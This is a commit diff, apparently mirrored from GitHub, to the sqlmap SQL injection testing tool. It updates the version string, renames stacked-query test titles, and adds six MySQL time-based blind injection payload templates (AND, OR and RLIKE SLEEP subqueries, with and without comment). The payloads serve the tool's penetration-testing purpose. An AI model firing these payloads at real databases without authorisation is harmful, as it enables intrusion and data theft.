Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit 74d0315

Browse files
committed
Update related to the last commit
1 parent ae98159 commit 74d0315

3 files changed

Lines changed: 126 additions & 3 deletions

File tree

lib/core/settings.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -19,7 +19,7 @@
1919
from lib.core.revision import getRevisionNumber
2020

2121
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
22-
VERSION = "1.0.7.0"
22+
VERSION = "1.0.7.1"
2323
REVISION = getRevisionNumber()
2424
STABLE = VERSION.count('.') <= 2
2525
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")

xml/payloads/04_stacked_queries.xml

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,7 @@
4444
</test>
4545

4646
<test>
47-
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP - comment)</title>
47+
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP - comment)</title>
4848
<stype>4</stype>
4949
<level>2</level>
5050
<risk>1</risk>
@@ -65,7 +65,7 @@
6565
</test>
6666

6767
<test>
68-
<title>MySQL &gt; 5.0.11 stacked queries (SLEEP)</title>
68+
<title>MySQL &gt; 5.0.11 stacked queries (query SLEEP)</title>
6969
<stype>4</stype>
7070
<level>3</level>
7171
<risk>1</risk>

xml/payloads/05_time_blind.xml

Lines changed: 123 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -84,6 +84,88 @@
8484
</details>
8585
</test>
8686

87+
<test>
88+
<title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
89+
<stype>5</stype>
90+
<level>2</level>
91+
<risk>1</risk>
92+
<clause>1,2,3,9</clause>
93+
<where>1</where>
94+
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
95+
<request>
96+
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
97+
</request>
98+
<response>
99+
<time>[SLEEPTIME]</time>
100+
</response>
101+
<details>
102+
<dbms>MySQL</dbms>
103+
<dbms_version>&gt;= 5.0.12</dbms_version>
104+
</details>
105+
</test>
106+
107+
<test>
108+
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP)</title>
109+
<stype>5</stype>
110+
<level>2</level>
111+
<risk>3</risk>
112+
<clause>1,2,3,9</clause>
113+
<where>1</where>
114+
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
115+
<request>
116+
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
117+
</request>
118+
<response>
119+
<time>[SLEEPTIME]</time>
120+
</response>
121+
<details>
122+
<dbms>MySQL</dbms>
123+
<dbms_version>&gt;= 5.0.12</dbms_version>
124+
</details>
125+
</test>
126+
127+
<test>
128+
<title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP - comment)</title>
129+
<stype>5</stype>
130+
<level>3</level>
131+
<risk>1</risk>
132+
<clause>1,2,3,9</clause>
133+
<where>1</where>
134+
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
135+
<request>
136+
<payload>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
137+
<comment>#</comment>
138+
</request>
139+
<response>
140+
<time>[SLEEPTIME]</time>
141+
</response>
142+
<details>
143+
<dbms>MySQL</dbms>
144+
<dbms_version>&gt;= 5.0.12</dbms_version>
145+
</details>
146+
</test>
147+
148+
<test>
149+
<title>MySQL &gt;= 5.0.12 OR time-based blind (query SLEEP - comment)</title>
150+
<stype>5</stype>
151+
<level>3</level>
152+
<risk>3</risk>
153+
<clause>1,2,3,9</clause>
154+
<where>1</where>
155+
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
156+
<request>
157+
<payload>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
158+
<comment>#</comment>
159+
</request>
160+
<response>
161+
<time>[SLEEPTIME]</time>
162+
</response>
163+
<details>
164+
<dbms>MySQL</dbms>
165+
<dbms_version>&gt;= 5.0.12</dbms_version>
166+
</details>
167+
</test>
168+
87169
<test>
88170
<title>MySQL &lt;= 5.0.11 AND time-based blind (heavy query)</title>
89171
<stype>5</stype>
@@ -207,6 +289,47 @@
207289
</details>
208290
</test>
209291

292+
<test>
293+
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP)</title>
294+
<stype>5</stype>
295+
<level>3</level>
296+
<risk>1</risk>
297+
<clause>1,2,3,9</clause>
298+
<where>1</where>
299+
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
300+
<request>
301+
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
302+
</request>
303+
<response>
304+
<time>[SLEEPTIME]</time>
305+
</response>
306+
<details>
307+
<dbms>MySQL</dbms>
308+
<dbms_version>&gt;= 5.0.12</dbms_version>
309+
</details>
310+
</test>
311+
312+
<test>
313+
<title>MySQL &gt;= 5.0.12 RLIKE time-based blind (query SLEEP - comment)</title>
314+
<stype>5</stype>
315+
<level>4</level>
316+
<risk>1</risk>
317+
<clause>1,2,3,9</clause>
318+
<where>1</where>
319+
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
320+
<request>
321+
<payload>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
322+
<comment>#</comment>
323+
</request>
324+
<response>
325+
<time>[SLEEPTIME]</time>
326+
</response>
327+
<details>
328+
<dbms>MySQL</dbms>
329+
<dbms_version>&gt;= 5.0.12</dbms_version>
330+
</details>
331+
</test>
332+
210333
<test>
211334
<title>MySQL AND time-based blind (ELT)</title>
212335
<stype>5</stype>

0 commit comments

Comments
 (0)